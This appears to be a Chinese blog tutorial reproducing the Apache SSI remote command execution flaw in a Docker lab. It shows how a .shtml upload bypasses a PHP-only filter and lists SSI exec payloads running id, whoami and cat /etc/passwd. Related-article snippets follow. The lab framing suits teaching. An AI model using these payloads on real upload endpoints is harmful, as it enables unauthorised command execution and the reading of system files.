漏洞复现(Apache SSI 远程命令执行漏洞)

于 2023-02-19 17:20:15 发布
阅读量140 收藏 1
点赞数 1
分类专栏: 网络安全 文章标签: 安全 Powered by 金山文档
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53409748/article/details/129112130
版权

简介

SSI 注入全称Server-Side Includes Injection,即服务端包含注入。

目标服务器开启了ssi功能,那么shtml文件将可以执行任意命令。

在SSI中,默认扩展名是 .stm、.shtm 和 .shtml。

如果上传文件程序限制了php文件的上传,且没有限制shtml文件上传,我们可以上传一个shtml文件,并利用<!--#exec cmd="命令" -->语法执行任意命令。

实验环境

靶机:使用docker搭建的环境 (192.168.121.131)

攻击机: win10 (192.168.121.132)

漏洞复现:

启动环境:

cd 到环境对应的目录后 docker-compose -up -d 启动

启动环境后,使用浏览器进行访问http://192.168.121.131:8080/upload.php可以看到一个上传表单

尝试上传一个php类型的文件,但不支持该类型文件进行上传

上传一个后缀为.shtml的文件

<!--#exec cmd="id" -->

可以看到上传成功,点击查看

也可将文件中的id替换成其他内容,例如:

<!--#exec cmd="whoami" -->
<!--#exec cmd="cat /etc/passwd" -->

复现成功

²⁰⁰²₀₂.₀₁T̶B̶
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Apache Commons FileUpload & Apache Tomcat拒绝服务漏洞解决方案
bocco的博客
02-23 1600
近日,安全狗应急响应中心关注到Apache官方发布安全公告,披露在Apache Commons FileUpload<1.5版本中存在一处拒绝服务漏洞(CVE-2023-24998)。Commons FileUpload是Apache组织提供的免费的上传组件。由于Apache Commons FileUpload对请求部分要处理的数量未做限制,导致攻击者可以利用此漏洞恶意上传或一系列上传触发拒绝服务。
文件上传 - Apache SSI远程命令执行
Kevin's Blog
07-19 1267
文章目录一、漏洞原理二、漏洞场景/挖掘思路三、触发条件四、漏洞复现4.1 启动环境4.2 访问环境4.3 复现过程五、防御措施 一、漏洞原理   在测试任意文件上传漏洞的时候,目标服务端可能不允许上传php / jsp / asp后缀的文件。如果目标服务器开启了SSI与CGI支持,我们可以上传一个shtml文件,并利用语法执行任意命令。 Tips:(shtml释义) T1(作用?): 一些大的...
SHTML文件介绍
cnds123的专栏
07-25 7624
SHTML文件(以.shtml文件扩展名的文件)和HTML文件差不多,都是网页文件,只是SHTML文件中有服务器端包含(server-side includes,SSI)指令。它在发送到用户浏览器之前由web服务器进行处理(或解析)——把SHTML文件中包含的SSI指令解释出来,服务器传送给客户端的文件,是已经解释的SHTML,不会有SSI指令——它实现了HTML所没有的功能。.........
shtml学习笔记
专栏
01-31 787
一、什么是.shtml文件提到.shtml文件就不得不提到ssiSSI被称为“服务器端包含”或“服务器端嵌入”技术。是一种基于服务器端的网页制作技术。.shtml文件就是应用了SSI技术的.html文件。二、SSI工作原理因为是基于服务器端的网页制作技术,所以在.shtml页面返回到客户端前,页面中的SSI指令将被服务器解析。可以使用SSI指令将其它文件、图片包含
Apache SSI 远程命令执行漏洞 漏洞复现
鸥鹭忘机
09-30 727
前言&原理 如果目标服务器开启了ssi功能,那么shtml文件将可以执行任意命令。如果上传文件程序限制了php文件的上传,且没有限制shtml文件上传,我们可以上传一个shtml文件,并利用<!--#exec cmd="命令" -->语法执行任意命令ssi详细讲解请参考:https://blog.csdn.net/weixin_30399871/article/details/94779816,什么是SSIssi漏洞挖掘思路请参考:https://blog.csdn.net/q
Apache默认是不支持SSI如何给Apache增加SSI支持
09-15
需要注意的是,由于SSI是基于文件系统的,它可能会带来安全风险,比如允许恶意用户通过SSI漏洞执行任意命令。因此,在启用SSI时,一定要确保你的网站目录权限设置得当,避免敏感信息泄露或被恶意利用。 总的来说,...
配置Apache支持shtml(SSI)的方法
09-15
这三行分别表示加载ssi_module模块,指定.shtml文件类型为HTML并启用包含过滤器,使得Apache在处理.shtml文件时执行SSI指令。 如果你希望全局开启SSI,即所有站点都支持,可以将上述配置添加到`httpd.conf`的适当...
apache SHTML网页SSI使用详解
01-11
方法一:下面是详细的设置apache支持shtml的设置步骤开启includes模块运行shtml 0、开启php环境安装目录 (我的为D:\wamp\Apache2\conf下) 的httpd.conf 文件中的(大概408-409行处): 1、 AddType text/...
apache ssi 使用例子
09-01
在技术上,SSI就是在静态HTML文件中,根据需求插入不同的内容。 例如一个article的频道,每一个article内页都生成一个静态的HTML,如此时,header某个位置需要修改,则需要重新生成所有article的静态HTML文件。 如...
SSI使用详解
一叶舟轻
10-14 2244
可以看看Apache的rewrite模块和SSI(Server Side Include).====================================================================SSI使用详解你是否曾经或正在为如何能够在最短的时间内完成对一个包含上千个页面的网站的修改而苦恼?那么可以看一下本文的介绍,或许能够对你有所帮助。什么是SSISSI
Baby_Upload
ce666666的博客
01-16 256
前言 考点:shtml文件上传 步骤 来到上传页面 图片,.hataccess,.user.ini,图片马这些上传不了 尝试上传shtml shtml:服务器端嵌入,类似ASP的基于服务器的网页制作.支持SSI命令. SSI命令 <!-- 指令名称="指令参数"> 主要指令有include,echo,exec exec指令语法 <!--#exec cmd="文件名称"--> <!--#exec cgi="文件名称"--> 得到ffffff?llll
中间件漏洞 | Apache-SSI/任意命令执行
最新发布
weixin_52116519的博客
11-05 572
Apache SSI 远程命令执行漏洞在测试任意文件上传漏洞的时候,目标服务端可能不允许上传php后缀的文件。如果目标服务器开启了SSI与CGI支持,我们可以上传一个shtml文件,并利用
buuctf刷题9 (反序列化逃逸&shtml-SSI远程命令执行&idna与utf-8编码漏洞)
weixin_63231007的博客
10-20 1961
如果我们传入 _SESSION[imgflagphp]=1111 会发现 s:10:"img" 我们输入的flagphp被替换为了空,只剩下了img,这样就有反序列化逃逸那味了,逃逸了7个字符。序列化串为:a:4:{s:5:"phone";因为我们要让img的内容为d0g3_f1ag.phpbase64编码后的字符串,所以要传_SESSION[img]=s:3:"img";看一下这个序列化串:a:2:{s:10:"img";s:3:"img";
Apache开启SSI,文件上传Getshell复现
Adminxe的博客
05-22 893
一、什么是shtml 使用SSI(Server Side Include)的html文件扩展名,SSI(Server Side Include),通常称为“服务器端嵌入”或者叫“服务器端包含”,是一种类似于ASP的基于服务器的网页制作技术。 二、SSI指令基本格式 我这里就列举本文用到的 程序代码: <!–指令名称=”指令参数”> exec 作用:将某一外部程序的输出插入到页面中 语法: <!–#exec cmd=”文件名称”–> 参数: cmd 常规应用程序 示例:...
html页面实现文件上传
热门推荐
xiongtiancheng的博客
05-21 13万+
因为业务的需求,需要实现一个通过浏览器把本地文件上传到服务器的功能,因为之前没有做过,所以也是经过了一番探索才实现了这个功能,这里只介绍前端的实现,后台的接收、验证和保存就不介绍了。 这个流程如下: 1、读取本地文件 2、建立和服务器的连接(使用AJAX) 3、上传一些头信息和文件流 4、等待服务器响应后,显示结果 读取本地文件,在页面中点击 "浏览" 后,弹出文件选择对话框,使...
Apache SSI 远程命令执行漏洞SSI注入漏洞
qq_45521281的博客
07-25 3018
SSI 服务器端包含 SSI(server-side includes)能帮我们实现什么功能: SSI提供了一种对现有HTML文档增加动态内容的方法,即在html中加入动态内容。 SSI嵌入HTML页面中的指令,在页面被提供时由服务器进行运算,以对现有HTML页面增加动态生成的内容,而无须通过CGI程序提供其整个页面,或者使用其他动态技术。 从技术角度上来说,SSI就是在HTML文件中,可以通过注释行调用的命令或指针,即允许通过在HTML页面注入脚本或远程执行任意命令。 在测试任意文件上传漏洞的时候,目标
漏洞复现----8、Apache SSI远程命令执行
七天
11-22 1475
文章目录一、SSI服务端包含)简介1、SSI服务端包含)简介2、SHTML简介二、漏洞复现 一、SSI服务端包含)简介 1、SSI服务端包含)简介 SSI嵌入HTML页面中的指令,在页面被提供时由服务器进行运算,以对现有HTML页面增加动态生成的内容,而无须通过CGI程序提供其整个页面,或者使用其他动态技术。 SSI就是在HTML文件中,可以通过注释行调用的命令或指针,即允许通过在HTML页面注入脚本或远程执行任意代码。 SSI工作原理:将内容发送到浏览器之前,可以使用“服务器端包含 (SSI
Apache SSI教程:实战与配置详解
安装后,用户可以根据官方文档自定义配置,但教程主要关注如何在Apache的配置文件(如`httpd.conf`)中添加必要的指令来支持SSI,如添加`AddType`、`Options`和`AddOutputFilter`等,以便处理`.ssi`类型的HTML文件,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值